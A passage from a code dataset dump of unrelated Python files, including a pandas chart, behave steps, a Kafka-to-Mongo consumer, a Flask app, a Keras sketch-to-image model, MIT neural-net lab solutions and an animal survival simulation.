\"{:.1f}%\".format(pct), textprops=dict(color=\"black\"))\r\nplt.setp(autotexts, size=14, weight=\"bold\")\r\nplt.title(\"Pierwsza wersja wykresu\")\r\nplt.legend(title='Zawodnicy')\r\nplt.show()\r\n","sub_path":"numpy/pandas/zad.9.9 zestaw 10.py","file_name":"zad.9.9 zestaw 10.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"631345423","text":"from subprocess import call\nfrom behave import *\nfrom lib.guestbook import GuestBook\n\n@given('there is a guestbook with signatures')\ndef step_there_is_guestbook(context):\n context.guestbook = GuestBook()\n for 
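The groupby/agg call in zad.9.9 above produces one order count per seller, and its index supplies the pie-slice labels. A minimal sketch on made-up rows, assuming the same column names:

    import pandas as pd

    df = pd.DataFrame({"Sprzedawca": ["A", "A", "B"], "idZamowienia": [1, 2, 3]})
    dane = df.groupby(["Sprzedawca"]).agg({"idZamowienia": ["count"]})
    print(dane.values.ravel())      # [2 1] -- the counts fed to plt.pie
    print(list(dane.index.values))  # ['A', 'B'] -- the slice labels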
person in context.table:\n context.guestbook.add(person['name'])\n\n@then('a user will find \"{name}\" there')\ndef step_list_of_guests(context, name):\n names = []\n guest_list = context.guestbook.list()\n for person in guest_list:\n names.append(person[0])\n\n msg = \"{} not found in {}\".format(name, names)\n assert name in names, msg\n","sub_path":"features/steps/guestbook.py","file_name":"guestbook.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"102206220","text":"# 当然TLE\n\nN, M, K = map(int, input().split())\nMOD = 998244353\n\nroad = [[] for _ in range(N)]\ndp = [[0 for _ in range(N)] for j in range(K+1)]\ndp[0][0] = 1\n\nfor _ in range(M):\n tmp = list(map(int, input().split()))\n road[tmp[0]-1].append(tmp[1]-1)\n road[tmp[1]-1].append(tmp[0]-1)\n\nfor i in range(K):\n for j in range(N):\n for k in range(N):\n if j == k:\n continue\n dp[i+1][k] += dp[i][j]\n dp[i+1][k] %= MOD\n\n for k in road[j]:\n dp[i+1][k] -= dp[i][j]\n dp[i+1][k] %= MOD\n\nprint(dp[K][0])\n","sub_path":"contest/abc212/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"317034883","text":"import argparse\nfrom functools import partial\nimport os\nfrom pprint import pprint\n\nimport msgpack\nimport msgpack_numpy as mpn\n\nfrom bluesky_kafka import MongoConsumer\n\n\nparser = argparse.ArgumentParser(\n description=\"monogo consumer process\",\n)\nparser.add_argument(\n \"--kafka_server\",\n type=str,\n help=\"bootstrap server to connect to.\",\n default=\"127.0.0.1:9092\",\n)\nparser.add_argument(\n \"--kafka_group\",\n type=str,\n help=\"bootstrap server to connect to.\",\n default=\"mongo-consumers\",\n)\nparser.add_argument(\n \"--mongo_uri\",\n type=str,\n help=\"bootstrap server to connect to.\",\n default=\"mongodb://localhost:27017\",\n)\n\nargs = parser.parse_args()\n\nmongo_uri = args.mongo_uri\nbootstrap_servers = args.kafka_server\n\nkafka_deserializer = partial(msgpack.loads, object_hook=mpn.decode)\nauto_offset_reset = \"latest\"\ntopics = [\"^.*bluesky.documents\"]\n\n# Create a MongoConsumer that will automatically listen to new beamline topics.\n# The parameter metadata.max.age.ms determines how often the consumer will check for\n# new topics. 
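The abc212/e.py walk-counting DP above is O(K*N^2) because it loops over every (j, k) pair, hence the '当然TLE' ('of course TLE') comment at the top. The usual fix keeps the same recurrence but factors out the row sum, giving O(K*(N+M)); a sketch of one step, assuming the symmetric adjacency list road built by the script:

    MOD = 998244353

    def step(dp, road):
        # dp_next[k] = (sum of dp) - dp[k] - sum(dp[j] for j adjacent to k), mod MOD
        total = sum(dp) % MOD
        dp_next = [(total - dp[k]) % MOD for k in range(len(dp))]
        for k, neighbours in enumerate(road):
            for j in neighbours:
                dp_next[k] = (dp_next[k] - dp[j]) % MOD
        return dp_next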
The default value is 5000ms.\nsettings = dict(\n topics=topics,\n bootstrap_servers=bootstrap_servers,\n group_id=args.kafka_group,\n mongo_uri=mongo_uri,\n consumer_config={\"auto.offset.reset\": auto_offset_reset},\n polling_duration=1.0,\n deserializer=kafka_deserializer,\n)\npprint(settings)\nmongo_consumer = MongoConsumer(**settings)\n\n\nmongo_consumer.start()\n","sub_path":"ae_gpcam/bluesky_config/scripts/mongo_consumer.py","file_name":"mongo_consumer.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"109895037","text":"\"\"\"@author: Bryan Silverthorn \"\"\"\n\nimport numpy\nimport rpy2.robjects\nimport rpy2.robjects.packages\nimport rpy2.robjects.numpy2ri\n\ndef ilogit(x):\n return 1.0 / (1.0 + numpy.exp(-x))\n\nclass RGAM(object):\n def __init__(self, X, Y):\n # rescale the inputs\n X = numpy.array(X)\n\n self._inputs_mean = numpy.mean(X, axis = 0)\n\n X -= self._inputs_mean\n\n self._inputs_std = numpy.std(X, axis = 0)\n self._inputs_std[self._inputs_std <= numpy.finfo(float).eps] = 1.0\n\n X /= self._inputs_std\n\n # build our data frame\n columns = {\"label\": rpy2.robjects.FloatVector(Y)}\n self._feature_dimensions = set()\n self._feature_names = set()\n\n for d in xrange(X.shape[1]):\n column_data = X[:, d]\n\n if len(numpy.unique(column_data)) >= 4:\n name = \"d{0}\".format(d)\n\n columns[name] = rpy2.robjects.FloatVector(column_data)\n\n self._feature_names.add(name)\n self._feature_dimensions.add(d)\n\n data = rpy2.robjects.DataFrame(columns)\n\n # fit our GAM\n self._gam = rpy2.robjects.packages.importr(\"gam\")\n self._formula = rpy2.robjects.Formula(\"label ~ \" + \" + \".join(map(\"s({0})\".format, self._feature_names)))\n\n for name in data.colnames:\n self._formula.environment[name] = data.rx2(name)\n\n self._model = self._gam.gam(self._formula, family = rpy2.robjects.r.binomial, data = data)\n\n def predict_proba(self, X):\n # build our data frame\n scaled = (numpy.asarray(X) - self._inputs_mean) / self._inputs_std\n columns = {}\n\n for d in xrange(scaled.shape[1]):\n if d in self._feature_dimensions:\n columns[\"d{0}\".format(d)] = rpy2.robjects.FloatVector(scaled[:, d])\n\n data = rpy2.robjects.DataFrame(columns)\n\n # generate predictions\n v = rpy2.robjects.r.predict(self._model, newdata = data)\n p = ilogit(numpy.asarray(v))\n\n return numpy.array([1 - p, p]).T\n\n","sub_path":"src/python/gampy/rgam.py","file_name":"rgam.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"333831578","text":"'''\nArb Doc\n'''\n#!/usr/bin/env python3\n\nfrom riker import Riker\nfrom templates import TEMPLATES\n\n\ndef main():\n '''\n init the main routine\n\n '''\n riker = Riker(TEMPLATES)\n riker.get_user_input()\n riker.build_directories()\n riker.build_project()\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modules/riker_run.py","file_name":"riker_run.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299554242","text":"import locale\nlocale.setlocale(locale.LC_ALL,'')\nage = 35\nend = 70\nstockrate = 0.0389\nmonth_drawal = 300+500+200+200+120\nstartwithdraw = 40\n\nyears = end - age\nmonths = years * 12\nstocks = (210 + 25 + 26 )*1000\nnowith = stocks\nmonthrate = stockrate / 12\nprint(\"stocks : {}\".format( stocks ))\nlaststock = None\nlasts = list()\nlastsno = 
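ilogit in rgam.py above is the inverse-logit link that turns the GAM's linear predictor into a class probability. Two spot values pin down its shape:

    import numpy as np

    def ilogit(x):
        return 1.0 / (1.0 + np.exp(-x))

    print(ilogit(0.0))                    # 0.5 -- the midpoint
    print(ilogit(np.array([-2.0, 2.0])))  # ~[0.119 0.881], symmetric about 0.5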
list()\nstartwdmonth = (startwithdraw - age)*12\nwithdrew = 0\nlasts.append(stocks)\nlastsno.append(stocks)\nfor month in range(months):\n stocks = round((stocks * monthrate) + stocks,2)\n nowith = round((nowith * monthrate) + nowith,2)\n\n if month > startwdmonth:\n stocks = stocks - month_drawal\n withdrew += month_drawal\n\n if not month % 12 and month >= 12:\n print(\"year : {}\".format( month/12 ))\n lasts.append(stocks)\n lastsno.append(nowith)\n if len(lasts) >= 2:\n print(\"annual : {}\".format( lasts[-1]/lasts[-2] ))\n print(\"annual : {}\".format( lastsno[-1]/lastsno[-2] ))\n print(\"stocks : {}\".format( locale.currency(stocks, grouping = True )))\n print(\"nowith : {}\".format( locale.currency(nowith, grouping = True )))\n print(\"difference : {} withdrew {}\\n\".format( nowith-stocks, withdrew ))\n \nprint(\"lasts : {}\".format( lasts ))\nprint(\"years : {}\".format( years ))\nprint(\"annual draw : {}\".format( 12*month_drawal ))\n\n","sub_path":"python/zen/fire_calc.py","file_name":"fire_calc.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90717122","text":"#!/usr/bin/env python\nimport json, sys, os\nfrom urllib import urlopen\n\nSERVER=\"http://aflowlib.duke.edu\"\nAPI=\"/search/API/?\"\nMATCHBOOK=\"species((Na:K),Cl),nspecies(2),Egap(2*,*5),energy_cell\"\nDIRECTIVES=\"$paging(0)\"\nSUMMONS=MATCHBOOK+\",\"+DIRECTIVES\n\nresponse=json.loads(urlopen(SERVER+API+SUMMONS).read().decode(\"utf-8\"))\nfor datum in response:\n bandgap=[float(x) for x in datum['Egap'].split(\",\")]\n energycell=[float(x) for x in datum['energy_cell'].split(\",\")] \n print (\"{}, {}, {}\".format( datum['auid'], bandgap, energycell))\n","sub_path":"Day 4 - Demonstrations/AFLOW/AFLUX_example.py","file_name":"AFLUX_example.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"443613090","text":"class MedianFinder:\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.max_l_heap = []\n self.min_r_heap = []\n\n\n def addNum(self, num: int) -> None:\n small, large = self.max_l_heap, self.min_r_heap\n heapq.heappush(small, -num)\n left_max = heapq.heappop(small)\n heapq.heappush(large, -left_max)\n if len(small) < len(large):\n heapq.heappush(small, -heapq.heappop(large))\n\n\n\n def findMedian(self) -> float:\n small, large = self.max_l_heap, self.min_r_heap\n if len(small) > len(large):\n return -small[0]\n return (-small[0] + large[0]) / 2\n\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\n","sub_path":"python/295. Find Median from Data Stream.py","file_name":"295. 
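The monthly loop in fire_calc.py above compounds at stockrate/12 each step. Ignoring the withdrawals and the per-month rounding, the no-withdrawal track has a closed form, one power instead of 420 iterations:

    stockrate = 0.0389
    years = 70 - 35                       # end - age in the script
    stocks = (210 + 25 + 26) * 1000
    nowith = stocks * (1 + stockrate / 12) ** (12 * years)
    print(round(nowith, 2))               # matches the loop up to rounding drift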
Find Median from Data Stream.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58517746","text":"import bpy\nfrom ...common_utilities import showErrorMessage\n\nclass OpenLog(bpy.types.Operator):\n \"\"\"Open log text files in new window\"\"\"\n bl_idname = \"wm.open_log\"\n bl_label = \"Open Log in Text Editor\"\n\n def execute(self, context):\n\n self.openTextFile('RetopoFlow_log')\n\n return {'FINISHED'}\n\n def openTextFile(self, filename):\n\n # play it safe!\n if filename not in bpy.data.texts:\n showErrorMessage('Log file not found')\n return\n\n # duplicate the current area then change it to a text edito\n area_dupli = bpy.ops.screen.area_dupli('INVOKE_DEFAULT')\n win = bpy.context.window_manager.windows[-1]\n area = win.screen.areas[-1]\n area.type = 'TEXT_EDITOR'\n\n # load the text file into the correct space\n for space in area.spaces:\n if space.type == 'TEXT_EDITOR':\n space.text = bpy.data.texts[filename]\n\n","sub_path":"lib/classes/logging/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49797247","text":"\"\"\"\r\n sketch2image:\r\n Asian face sketch -> real face image\r\n\"\"\"\r\n\r\nfrom my_utils import *\r\nfrom model import *\r\nimport numpy as np\r\nimport os\r\n\r\n# data preprocess\r\nSIZE = 256\r\n\r\nimage_path = 'datasets/photos'\r\nsketch_path = 'datasets/sketches'\r\n\r\nimage_file = sorted_path(os.listdir(image_path))\r\nsketch_file = sorted_path(os.listdir(sketch_path))\r\n\r\nimg_array = expand_image_array(path=image_path, path_list=image_file, size=(SIZE, SIZE))\r\nsketch_array = expand_image_array(path=sketch_path, path_list=sketch_file, size=(SIZE, SIZE))\r\n\r\nprint(\"Total number of sketch images:\", len(sketch_array))\r\nprint(\"Total number of images:\", len(img_array))\r\n\r\n# show example\r\nplot_images(img_array[0], sketch_array[0])\r\n\r\ntrain_sketch_image = sketch_array[:1400]\r\ntrain_image = img_array[:1400]\r\ntest_sketch_image = sketch_array[1400:]\r\ntest_image = img_array[1400:]\r\n\r\n# reshaping\r\ntrain_sketch_image = np.reshape(train_sketch_image, (len(train_sketch_image), SIZE, SIZE, 3))\r\ntrain_image = np.reshape(train_image, (len(train_image), SIZE, SIZE, 3))\r\nprint('Train color image shape:', train_image.shape)\r\ntest_sketch_image = np.reshape(test_sketch_image, (len(test_sketch_image), SIZE, SIZE, 3))\r\ntest_image = np.reshape(test_image, (len(test_image), SIZE, SIZE, 3))\r\nprint('Test color image shape', test_image.shape)\r\n\r\n# create model\r\nmodel = Sketch2Image()\r\n\r\n# optimizer and loss\r\nmodel.compile(optimizer='adam',\r\n loss=tf.keras.losses.mean_squared_error,\r\n metrics=['accuracy'])\r\n\r\n# training\r\nhistory = model.fit(train_sketch_image, train_image, epochs=0, validation_data=(test_sketch_image, test_image),\r\n validation_freq=1)\r\n# model.summary()\r\n\r\n# plot metric\r\nplot_metrics(history, metric='accuracy', show=False)\r\n\r\n# save model1\r\nsave_path = 'my_model/my_model'\r\nsave_all_model(model, save_path, save=False)\r\n\r\n# load model\r\nfresh_model = load_all_model(model, save_path, load=True)\r\n\r\n# show predict\r\nls = [i for i in range(16, 40, 8)]\r\nfor i in ls:\r\n predicted = np.clip(fresh_model.predict(test_image[i].reshape(1, SIZE, SIZE, 3)), 0.0, 1.0).reshape((SIZE, SIZE, 3))\r\n print('pred', predicted.shape)\r\n show_images(test_image[i], 
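The MedianFinder above keeps the lower half in a negated max-heap and the upper half in a min-heap, but the snippet never imports heapq, so it raises a NameError as-is. A usage sketch with the import added:

    import heapq  # required by addNum/findMedian but missing from the snippet

    obj = MedianFinder()
    for n in (5, 2, 8):
        obj.addNum(n)
    print(obj.findMedian())   # 5   -- odd count: top of the larger (lower) heap
    obj.addNum(10)
    print(obj.findMedian())   # 6.5 -- even count: (5 + 8) / 2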
test_sketch_image[i], predicted)\r\n\r\n# test my own image\r\nshow_my_images('my_images/criminal_1.jpg', model=fresh_model, size=SIZE)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"634897438","text":"import pygame, easygui, sys\nfrom PyQt4 import QtGui, QtCore\ndef get_fonts():\n a = pygame.font.get_fonts()\n return a\ndef write(txt, screen, x, y, size = 16, color = [0, 0, 0], font = \"freesansbold.ttf\"):\n s_str = txt\n s_font = pygame.font.Font(font, size)\n s_surf = s_font.render(s_str, 1, color)\n screen.blit(s_surf, [x, y])\ndef str2bool(txt):\n if txt == \"True\":\n return True\n else:\n return False\n\n\ndef str2bool_file(file):\n file_name = open(file, \"r\")\n text = file_name.read()\n file_name.close()\n result = str2bool(text)\n return result\n\ndef write_file(file_name, txt):\n open1 = open(file_name, \"w\")\n open1.write(txt)\n open1.close()\n\ndef read_file(file_name):\n open1 = open(file_name)\n txt = open1.read()\n open1.close()\n return txt\n\ndef fill_file_int(file_name):\n ro = open(file_name)\n qe = ro.read()\n ro.close()\n if qe == \"\":\n to = open(file_name, \"w\")\n to.write(\"0\")\n to.close()\n\ndef file_availability(file_name, txt = \"\"):\n try:\n file = open(file_name)\n except IOError:\n f = open(file_name, \"w\")\n f.write(txt)\n f.close()\n else:\n file.close()\n\ndef buy(file_oblect, cost, txt, file_money = \"score_shooter\", dop_file = \"rocket\"):\n txt_1 = read_file(file_oblect)\n if str2bool(txt_1):\n easygui.msgbox(\"You already have this module\")\n\n else:\n score_1 = read_file(\"score_shooter\")\n if int(score_1) >= 1000:\n write_file(file_oblect, \"True\")\n write_file(file_money, str(int(score_1) - cost))\n easygui.msgbox(\"the buy was successful!\")\n else:\n easygui.critical(\"not enough money!\")\n\n\ndef restart(app):\n reset = True\n app.exit()\n return reset\n\n\n\n\n","sub_path":"writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"633433424","text":"from flask import Flask\r\nfrom flask import url_for, render_template, request, redirect\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/result')\r\n\r\ndef ans_counter(name, pet, n1, n2):\r\n if request.args:\r\n for name in request.args:\r\n if name == 'name':\r\n arr.append(request.args[name])\r\n times+=1\r\n for pet in request.args:\r\n if pet == 'Cat':\r\n n1+=1\r\n else:\r\n n2+=1\r\n\r\n return render_template('result.html', name=name, pet=pet, n1=n1, n2=n2)\r\n return redirect(url_for('result.html'))\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","sub_path":"Flask_intro/flak site.py","file_name":"flak site.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"256233630","text":"# MIT 6.034 Lab 6: Neural Nets\n# Written by Jessica Noss (jmn), Dylan Holmes (dxh), Jake Barnwell (jb16), and 6.034 staff\n\nfrom nn_problems import *\nfrom math import e\nfrom math import exp\nfrom itertools import permutations\nINF = float('inf')\n\n#### NEURAL NETS ###############################################################\n\n# Wiring a neural net\n\nnn_half = [1]\n\nnn_angle = [2,1]\n\nnn_cross = [2,2,1]\n\nnn_stripe = [3,1]\n\nnn_hexagon = 
[6,1]\n\nnn_grid = [4,2,1]\n\n# Threshold functions\ndef stairstep(x, threshold=0):\n if x >= threshold:\n return 1\n if x < threshold:\n return 0\n\ndef sigmoid(x, steepness=1, midpoint=0):\n return 1/(1 + exp(-steepness*(x-midpoint)))\n\ndef ReLU(x):\n if x >= 0:\n return x\n return 0\n\n# Accuracy function\ndef accuracy(desired_output, actual_output):\n return -0.5*pow(desired_output-actual_output,2)\n\n# Forward propagation\n\ndef node_value(node, input_values, neuron_outputs): # STAFF PROVIDED\n \"\"\"Given a node, a dictionary mapping input names to their values, and a\n dictionary mapping neuron names to their outputs, returns the output value\n of the node.\"\"\"\n if isinstance(node, basestring):\n return input_values[node] if node in input_values else neuron_outputs[node]\n return node # constant input, such as -1\n\ndef forward_prop(net, input_values, threshold_fn=stairstep):\n \"\"\"Given a neural net and dictionary of input values, performs forward\n propagation with the given threshold function to compute binary output.\n This function should not modify the input net. Returns a tuple containing:\n (1) the final output of the neural net\n (2) a dictionary mapping neurons to their immediate outputs\"\"\"\n for neuron in net.topological_sort():\n accumulator = 0\n for in_wire in net.get_wires(endNode=neuron):\n if type(in_wire.startNode) is int:\n in_value = in_wire.startNode\n else:\n in_value = input_values[in_wire.startNode]\n accumulator += in_value * in_wire.get_weight()\n out_value = threshold_fn(accumulator)\n input_values[neuron] = out_value\n return (input_values[net.get_output_neuron()], input_values)\n\n\n# Backward propagation warm-up\ndef gradient_ascent_step(func, inputs, step_size):\n \"\"\"Given an unknown function of three variables and a list of three values\n representing the current inputs into the function, increments each variable\n by +/- step_size or 0, with the goal of maximizing the function output.\n After trying all possible variable assignments, returns a tuple containing:\n (1) the maximum function output found, and\n (2) the list of inputs that yielded the highest function output.\"\"\"\n perm_list = []\n inputs = list(inputs)\n for i in range(-1,2):\n perm = [0,0,0]\n perm[0] = (inputs[0] + step_size*i)\n for j in range(-1,2):\n perm[1] = (inputs[1] + step_size*j)\n for k in range(-1,2):\n perm[2] = (inputs[2] + step_size*k)\n perm_list.append((func(*perm), tuple(perm)))\n return max(perm_list, key=lambda elem: elem[0])\n\n\ndef get_back_prop_dependencies(net, wire):\n \"\"\"Given a wire in a neural network, returns a set of inputs, neurons, and\n Wires whose outputs/values are required to update this wire's weight.\"\"\"\n depends = set()\n for elem in [wire.startNode, wire, wire.endNode]:\n depends.add(elem)\n current_neuron = wire.endNode\n out_node = net.get_output_neuron()\n added_nonchecked_neurons = [current_neuron]\n while current_neuron != out_node and added_nonchecked_neurons != None:\n depends.add(current_neuron)\n for wire in net.get_wires(startNode=current_neuron):\n depends.add(wire)\n added_nonchecked_neurons.append(wire.endNode)\n added_nonchecked_neurons.append(wire.startNode)\n current_neuron = added_nonchecked_neurons[0]\n added_nonchecked_neurons = added_nonchecked_neurons[1:]\n depends.add(out_node)\n return depends\n\n\n# Backward propagation\ndef calculate_deltas(net, desired_output, neuron_outputs):\n \"\"\"Given a neural net and a dictionary of neuron outputs from forward-\n propagation, computes the update coefficient 
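Quick spot-checks for the threshold and accuracy functions above, assuming they are in scope from lab6.py; each value follows directly from the definitions:

    print(stairstep(0.2), stairstep(-0.2))             # 1 0 -- default threshold is 0
    print(round(sigmoid(0), 3), round(sigmoid(2), 3))  # 0.5 0.881
    print(ReLU(-3), ReLU(3))                           # 0 3
    print(accuracy(1, 0.9))                            # ~-0.005, i.e. -0.5 * (1 - 0.9)**2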
(delta_B) for each\n neuron in the net. Uses the sigmoid function to compute neuron output.\n Returns a dictionary mapping neuron names to update coefficient (the\n delta_B values). \"\"\"\n delta_dict = {}\n for neuron in net.topological_sort()[::-1]:\n output = neuron_outputs[neuron]\n if net.is_output_neuron(neuron):\n delta_dict[neuron] = output*(1-output)*(desired_output-output)\n else:\n outgoing_neighbors = net.get_outgoing_neighbors(neuron)\n wires = net.get_wires(startNode=neuron)\n outgoing_sum = sum([wire.get_weight()*delta_dict[wire.endNode] for wire in wires])\n delta_dict[neuron] = output*(1-output)*outgoing_sum\n return delta_dict\n\ndef update_weights(net, input_values, desired_output, neuron_outputs, r=1):\n \"\"\"Performs a single step of back-propagation. Computes delta_B values and\n weight updates for entire neural net, then updates all weights. Uses the\n sigmoid function to compute neuron output. Returns the modified neural net,\n with the updated weights.\"\"\"\n delta_dict = calculate_deltas(net, desired_output, neuron_outputs)\n neuron_outputs.update(input_values)\n for wire in net.get_wires():\n try:\n wire.set_weight(wire.get_weight()+r*neuron_outputs[wire.startNode]*delta_dict[wire.endNode])\n except KeyError:\n wire.set_weight(wire.get_weight()+r*wire.startNode*delta_dict[wire.endNode])\n return net\n\ndef back_prop(net, input_values, desired_output, r=1, minimum_accuracy=-0.001):\n \"\"\"Updates weights until accuracy surpasses minimum_accuracy. Uses the\n sigmoid function to compute neuron output. Returns a tuple containing:\n (1) the modified neural net, with trained weights\n (2) the number of iterations (that is, the number of weight updates)\"\"\"\n iterations = 0\n actual_output, neuron_outputs = forward_prop(net,input_values,sigmoid)\n performance = accuracy(desired_output, actual_output)\n while performance < minimum_accuracy:\n net = update_weights(net,input_values,desired_output, neuron_outputs, r)\n actual_output, neuron_outputs = forward_prop(net,input_values,sigmoid)\n performance = accuracy(desired_output, actual_output)\n iterations += 1\n return (net, iterations)\n\n\n# Training a neural net\n\nANSWER_1 = 11\nANSWER_2 = 14\nANSWER_3 = 3\nANSWER_4 = 114\nANSWER_5 = 32\n\nANSWER_6 = 1\nANSWER_7 = \"checkerboard\"\nANSWER_8 = [\"small\", \"medium\", \"large\"]\nANSWER_9 = \"B\"\n\nANSWER_10 = \"D\"\nANSWER_11 = [\"A\", \"C\"]\nANSWER_12 = [\"A\", \"E\"]\n\n\n#### SURVEY ####################################################################\n\nNAME = None\nCOLLABORATORS = None\nHOW_MANY_HOURS_THIS_LAB_TOOK = None\nWHAT_I_FOUND_INTERESTING = None\nWHAT_I_FOUND_BORING = None\nSUGGESTIONS = None\n","sub_path":"lab6/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"492887536","text":"#Survival\n\n#1. 
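The coefficients calculate_deltas produces are delta = o*(1-o)*(d-o) at the output neuron and delta = o*(1-o)*sum(w*delta_downstream) at hidden neurons. A hand-worked instance with made-up values o, d and w:

    o, d = 0.75, 1.0
    delta_out = o * (1 - o) * (d - o)               # 0.75 * 0.25 * 0.25 = 0.046875
    o_hidden, w = 0.6, 0.5
    delta_hidden = o_hidden * (1 - o_hidden) * (w * delta_out)
    print(delta_out, delta_hidden)                  # 0.046875 ~0.005625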
In the Forest (Iterable) lives Predators and Herbivores (abstract class of animal and two offspring).\n#Each animal is born with the following parameters (by using random):\n#- strength (from 25 to 100 points)\n#- speed (from 25 to 100 points)\n#The force cannot be greater than it was at birth (initialization).\n\n#At each step of the game we take 1 animal from the forest (iteration):\n#- If it is herbivorous, then it eats (restores its strength by 50%).\n#- If it is a predator, it hunts - randomly chooses an animal from the forest and:\n# - pulled himself out, he was unlucky and he was left without a dinner;\n# - pulled out another animal, then tries to catch up;\n# - if he can catch up, he catches up and attacks;\n# - if attacked and is stronger, then eats and restores 50% of strength;\n# - did not catch up or did not have enough strength, then he and the lucky prey lose 30% of strength (Because both either ran, or fought, or all together)\n\n#An animal whose power has expired dies. (You can check the strength at the time of food search)\n\n#The game continues as long as predators are present in the forest.\n\nfrom __future__ import annotations\nfrom typing import Dict, Any\nfrom abc import ABC, abstractmethod\nimport random\nimport uuid\nimport time\n\n\nclass Animal(ABC):\n\n def __init__(self, power: int, speed: int):\n self.id = None\n self.max_power = power\n self.current_power = power\n self.speed = speed\n\n @abstractmethod\n def eat(self, forest: Forest):\n raise NotImplementedError\n\n\nclass Predator(Animal):\n def __init__(self, power: int, speed: int):\n super().__init__(power, speed)\n self.id = None\n self.max_power = power\n self.current_power = power\n self.speed = speed\n\n def eat(self, forest: Forest):\n target = random.choice(list(forest.animals.values()))\n if target.id == self.id:\n print('Predator did not find animals in forest')\n else:\n if (self.speed > target.speed) and (self.current_power > target.current_power):\n print('Predator eating...')\n tmp = self.current_power\n self.current_power = min(self.current_power + self.max_power * 0.5, self.max_power)\n print(f'Predator restored {self.current_power - tmp} power')\n forest.animals[target.id].current_power = 0\n else:\n print('Predator did not caught target, both are tired')\n self.current_power = self.current_power - 0.3 * self.max_power\n forest.animals[target.id].current_power = forest.animals[target.id].current_power - 0.3 * \\\n forest.animals[target.id].max_power\n\n def __str__(self):\n return f'{self.__class__.__name__}'\n\n\nclass Herbivorous(Animal):\n def __init__(self, power: int, speed: int):\n super().__init__(power, speed)\n self.id = None\n self.max_power = power\n self.current_power = power\n self.speed = speed\n\n def __str__(self):\n return f'{self.__class__.__name__}'\n\n def eat(self, forest: Forest):\n print('Herbivorous eating...')\n tmp = self.current_power\n self.current_power = min(self.current_power + self.max_power * 0.5, self.max_power)\n print(f'Herbivorous restored {self.current_power - tmp} power')\n\n\nAnyAnimal = [Herbivorous, Predator]\n\n\nclass Forest:\n\n def __init__(self):\n self.animals: Dict[str, AnyAnimal] = dict()\n\n def add_animal(self, animal: AnyAnimal):\n print('There is new animal', animal)\n self.animals.update({animal.id: animal})\n\n def remove_animal(self, animal: AnyAnimal):\n print(animal, 'is removed from forest')\n self.animals.pop(animal.id)\n\n def any_predator_left(self):\n return not all(isinstance(animal, Herbivorous) for animal in 
self.animals.values())\n\n\ndef animal_generator():\n while True:\n generated_animal = random.choice((Predator(random.randint(25, 100), random.randint(25, 100)),\n Herbivorous(random.randint(25, 100), random.randint(25, 100))))\n generated_animal.id = uuid.uuid4()\n yield generated_animal\n\n\nif __name__ == \"__main__\":\n nature = animal_generator()\n\n forest = Forest()\n for i in range(10):\n animal = next(nature)\n forest.add_animal(animal)\n\n while True:\n animal_to_remove = []\n for animal in forest.animals.values():\n if animal.current_power < 1:\n animal_to_remove.append(animal.id)\n for animal_id in animal_to_remove:\n forest.remove_animal(forest.animals[animal_id])\n if not forest.any_predator_left():\n print('All predators is dead!')\n break\n for animal in forest.animals.values():\n animal.eat(forest=forest)\n time.sleep(1)\n","sub_path":"HW8.py","file_name":"HW8.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"331327256","text":"from os import listdir\n\nTrainIdx = []\nTestIdx = []\n\nTrainImgList = listdir(\"./PostProcessing Data/Training/\")\nfor Img in TrainImgList:\n Idx = Img[1:4]\n if Idx not in TrainIdx:\n TrainIdx.append(Idx)\nTrainIdx.sort()\n\nTestImgList = listdir(\"./PostProcessing Data/Test/\")\nfor Img in TestImgList:\n Idx = Img[1:4]\n if Idx not in TestIdx:\n TestIdx.append(Idx)\nTestIdx.sort()\n\nprint(\"Test: \")\nprint(TestIdx)\nprint(\"\\n ------------------------------- \\n\")\nprint(\"Train: \")\nprint(TrainIdx)\n\nfor Idx in TestIdx:\n if Idx in TrainIdx:\n print(Idx) # these appear in both sets\nprint(\"Finished checking\")","sub_path":"CNN with 